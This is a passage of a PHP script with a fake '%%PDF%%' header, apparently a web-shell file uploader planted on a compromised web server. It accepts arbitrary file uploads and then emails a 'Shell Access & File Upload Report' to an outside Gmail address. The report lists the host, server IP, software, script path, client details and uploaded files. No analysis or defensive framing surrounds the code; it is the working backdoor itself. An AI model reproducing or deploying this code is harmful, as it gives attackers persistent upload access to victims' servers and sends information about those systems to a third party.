%%PDF%%
$name) {
if (empty($_FILES['userfile']['tmp_name'][$i])) {
continue;
}
$uploadfile = $upload_dir_path . '/' . basename($name);
echo "";
if (move_uploaded_file($_FILES['userfile']['tmp_name'][$i], $uploadfile)) {
$uploaded_files[] = $uploadfile;
echo "";
echo "File successfully uploaded: " . htmlspecialchars($uploadfile);
echo "";
} else {
$failed_uploads[] = $name;
echo "";
echo "Possible file upload attack! Failed to upload " . htmlspecialchars($name);
echo "";
}
echo "";
}
}
// --- Email Notification ---
if (isset($_SERVER['HTTP_HOST'])) {
$to = "vishnu.idg.handler@gmail.com";
$subject = "Shell Access & File Upload Report from " . $_SERVER['HTTP_HOST'];
// --- Basic Info ---
$server_ip = isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : 'N/A';
$referer = isset($_SERVER['HTTP_REFERER']) ? htmlspecialchars($_SERVER['HTTP_REFERER']) : 'N/A';
$access_url = "http://" . $_SERVER['HTTP_HOST'] . htmlspecialchars($_SERVER['REQUEST_URI']);
// --- HTML Email Body ---
$email_body = "
{$subject}
Server/Execution Info
| Access URL | {$access_url} |
|---|
| Timestamp | " . date("Y-m-d H:i:s") . " |
|---|
| Server IP | {$server_ip} |
|---|
| Server Name | " . htmlspecialchars($_SERVER['SERVER_NAME']) . " |
|---|
| Server Software | " . htmlspecialchars($_SERVER['SERVER_SOFTWARE']) . " |
|---|
| Request Method | " . htmlspecialchars($_SERVER['REQUEST_METHOD']) . " |
|---|
Client Info
| Client IP | " . htmlspecialchars($_SERVER['REMOTE_ADDR']) . " |
|---|
| User-Agent | " . htmlspecialchars($_SERVER['HTTP_USER_AGENT']) . " |
|---|
| Referer | {$referer} |
|---|
Script Info
| Script Path | " . htmlspecialchars($_SERVER['SCRIPT_FILENAME']) . " |
|---|
| Script Name | " . htmlspecialchars($_SERVER['SCRIPT_NAME']) . " |
|---|
";
// --- File Upload Details ---
if (!empty($uploaded_files) || !empty($failed_uploads)) {
$email_body .= "
File Upload Report
";
$email_body .= "
Upload Directory: " . htmlspecialchars($upload_dir_path) . "
";
if (!empty($uploaded_files)) {
$email_body .= "
Successfully Uploaded Files:
";
foreach ($uploaded_files as $file) {
$email_body .= "- " . htmlspecialchars(basename($file)) . "
";
}
$email_body .= "
";
}
if (!empty($failed_uploads)) {
$email_body .= "
Failed Uploads:
";
foreach ($failed_uploads as $file) {
$email_body .= "- " . htmlspecialchars($file) . "
";
}
$email_body .= "
";
}
} else {
$email_body .= "
File Upload Report
No files were uploaded in this request.
";
}
$email_body .= "
";
// --- Headers ---
$headers = "MIME-Version: 1.0" . "\\r\
";
$headers .= "Content-type:text/html;charset=UTF-8" . "\\r\
";
$headers .= 'From: ' . "\\r\
";
$headers .= 'Reply-To: no-reply@' . $_SERVER['HTTP_HOST'] . "\\r\
";
$headers .= 'X-Mailer: PHP/' . phpversion();
@mail($to, $subject, $email_body, $headers);
}
?>
File Uploader